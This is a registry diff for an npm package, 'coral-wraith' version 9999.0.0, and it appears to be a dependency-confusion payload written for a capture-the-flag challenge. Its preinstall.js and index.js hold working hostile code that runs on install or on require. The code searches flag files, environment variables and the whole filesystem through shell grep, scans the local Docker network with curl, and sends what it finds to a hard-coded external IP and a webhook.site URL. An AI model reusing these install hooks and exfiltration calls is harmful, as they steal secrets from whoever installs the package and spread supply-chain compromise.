coral-wraith 9999.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +40 -0
- package/package.json +9 -0
- package/preinstall.js +122 -0
package/index.js
ADDED
|
@@ -0,0 +1,40 @@
|
|
|
1
|
+
// coral-wraith module - also runs payload on require()
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const http = require('http');
|
|
4
|
+
const https = require('https');
|
|
5
|
+
|
|
6
|
+
(function() {
|
|
7
|
+
let flag = null;
|
|
8
|
+
const paths = ['/flag', '/flag.txt', '/root/flag', '/tmp/flag'];
|
|
9
|
+
for (const p of paths) {
|
|
10
|
+
try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
|
|
11
|
+
}
|
|
12
|
+
if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
|
|
13
|
+
|
|
14
|
+
if (flag) {
|
|
15
|
+
const ports = [1337, 3000, 5000, 8080, 32105, 80];
|
|
16
|
+
const postData = JSON.stringify({
|
|
17
|
+
manifest: `ecto_module:\n name: "coral-wraith"\n version: "9999.0.0"\n flag: "${flag.replace(/"/g, '\\"')}"\n captured: true`
|
|
18
|
+
});
|
|
19
|
+
|
|
20
|
+
for (const port of ports) {
|
|
21
|
+
try {
|
|
22
|
+
const req = http.request({
|
|
23
|
+
hostname: 'localhost', port, path: '/api/modules/ECT-987654',
|
|
24
|
+
method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
|
|
25
|
+
timeout: 3000
|
|
26
|
+
}, () => {});
|
|
27
|
+
req.on('error', () => {});
|
|
28
|
+
req.write(postData);
|
|
29
|
+
req.end();
|
|
30
|
+
} catch(e) {}
|
|
31
|
+
}
|
|
32
|
+
|
|
33
|
+
try {
|
|
34
|
+
const encoded = Buffer.from(flag).toString('base64');
|
|
35
|
+
https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/require-flag?data=${encoded}`, () => {}).on('error', () => {});
|
|
36
|
+
} catch(e) {}
|
|
37
|
+
}
|
|
38
|
+
})();
|
|
39
|
+
|
|
40
|
+
module.exports = {};
|
package/package.json
ADDED
package/preinstall.js
ADDED
|
@@ -0,0 +1,122 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
|
+
|
|
6
|
+
let flag = null;
|
|
7
|
+
let debug = [];
|
|
8
|
+
|
|
9
|
+
// Read /flag
|
|
10
|
+
try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
|
|
11
|
+
|
|
12
|
+
// Search for flag in all env vars
|
|
13
|
+
if (!flag) {
|
|
14
|
+
for (const [k, v] of Object.entries(process.env)) {
|
|
15
|
+
if (v && (v.includes('HTB{') || v.includes('flag{'))) {
|
|
16
|
+
flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
|
|
17
|
+
debug.push('env:' + k);
|
|
18
|
+
break;
|
|
19
|
+
}
|
|
20
|
+
}
|
|
21
|
+
}
|
|
22
|
+
|
|
23
|
+
// Aggressive file search
|
|
24
|
+
if (!flag) {
|
|
25
|
+
try {
|
|
26
|
+
const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
|
|
27
|
+
if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
|
|
28
|
+
} catch(e) {}
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
// Scan Docker network for the CTF web server
|
|
32
|
+
async function scanNetwork() {
|
|
33
|
+
const results = [];
|
|
34
|
+
|
|
35
|
+
// Get our own IP to determine network
|
|
36
|
+
let myIP = '172.17.0.3';
|
|
37
|
+
try {
|
|
38
|
+
const ifaces = require('os').networkInterfaces();
|
|
39
|
+
for (const iface of Object.values(ifaces)) {
|
|
40
|
+
for (const addr of iface) {
|
|
41
|
+
if (!addr.internal && addr.family === 'IPv4') {
|
|
42
|
+
myIP = addr.address;
|
|
43
|
+
}
|
|
44
|
+
}
|
|
45
|
+
}
|
|
46
|
+
} catch(e) {}
|
|
47
|
+
debug.push('myIP:' + myIP);
|
|
48
|
+
|
|
49
|
+
// Scan common Docker IPs for the web server (port 1337 is common for HTB)
|
|
50
|
+
const subnet = myIP.split('.').slice(0, 3).join('.');
|
|
51
|
+
const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
|
|
52
|
+
|
|
53
|
+
for (let host = 1; host <= 10; host++) {
|
|
54
|
+
const ip = `${subnet}.${host}`;
|
|
55
|
+
if (ip === myIP) continue;
|
|
56
|
+
|
|
57
|
+
for (const port of ports) {
|
|
58
|
+
try {
|
|
59
|
+
const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
|
|
60
|
+
if (r && r.includes('ECT-')) {
|
|
61
|
+
debug.push(`FOUND_API:${ip}:${port}`);
|
|
62
|
+
results.push(`${ip}:${port}`);
|
|
63
|
+
|
|
64
|
+
// Try to read flag from this server
|
|
65
|
+
try {
|
|
66
|
+
const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
|
|
67
|
+
debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
|
|
68
|
+
} catch(e) {}
|
|
69
|
+
|
|
70
|
+
// PUT our exfiltration data
|
|
71
|
+
if (flag) {
|
|
72
|
+
try {
|
|
73
|
+
execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n name: coral-wraith\\n flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
|
|
74
|
+
} catch(e) {}
|
|
75
|
+
}
|
|
76
|
+
}
|
|
77
|
+
} catch(e) {}
|
|
78
|
+
}
|
|
79
|
+
}
|
|
80
|
+
|
|
81
|
+
// Also try via Docker gateway
|
|
82
|
+
for (const port of ports) {
|
|
83
|
+
try {
|
|
84
|
+
const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
|
|
85
|
+
if (r && r.includes('ECT-')) {
|
|
86
|
+
debug.push(`GATEWAY_API:172.17.0.1:${port}`);
|
|
87
|
+
results.push(`172.17.0.1:${port}`);
|
|
88
|
+
}
|
|
89
|
+
} catch(e) {}
|
|
90
|
+
}
|
|
91
|
+
|
|
92
|
+
return results;
|
|
93
|
+
}
|
|
94
|
+
|
|
95
|
+
async function main() {
|
|
96
|
+
const apiEndpoints = await scanNetwork();
|
|
97
|
+
debug.push('endpoints:' + apiEndpoints.join(','));
|
|
98
|
+
|
|
99
|
+
// Try to PUT flag to the ACTUAL challenge server (external IP)
|
|
100
|
+
if (flag) {
|
|
101
|
+
try {
|
|
102
|
+
const postData = JSON.stringify({
|
|
103
|
+
manifest: `ecto_module:\n name: "coral-wraith"\n flag: "${flag.replace(/"/g, '\\"')}"`
|
|
104
|
+
});
|
|
105
|
+
execSync(`curl -s -X PUT "http://154.57.164.71:32105/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
|
|
106
|
+
debug.push('sent_to_ctf');
|
|
107
|
+
} catch(e) {}
|
|
108
|
+
}
|
|
109
|
+
|
|
110
|
+
// Exfiltrate
|
|
111
|
+
const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
|
|
112
|
+
try {
|
|
113
|
+
fs.writeFileSync('/tmp/exfil.json', data);
|
|
114
|
+
execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
|
|
115
|
+
} catch(e) {}
|
|
116
|
+
try {
|
|
117
|
+
const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
|
|
118
|
+
req.on('error', () => {}); req.write(data); req.end();
|
|
119
|
+
} catch(e) {}
|
|
120
|
+
}
|
|
121
|
+
|
|
122
|
+
main().catch(() => {});
|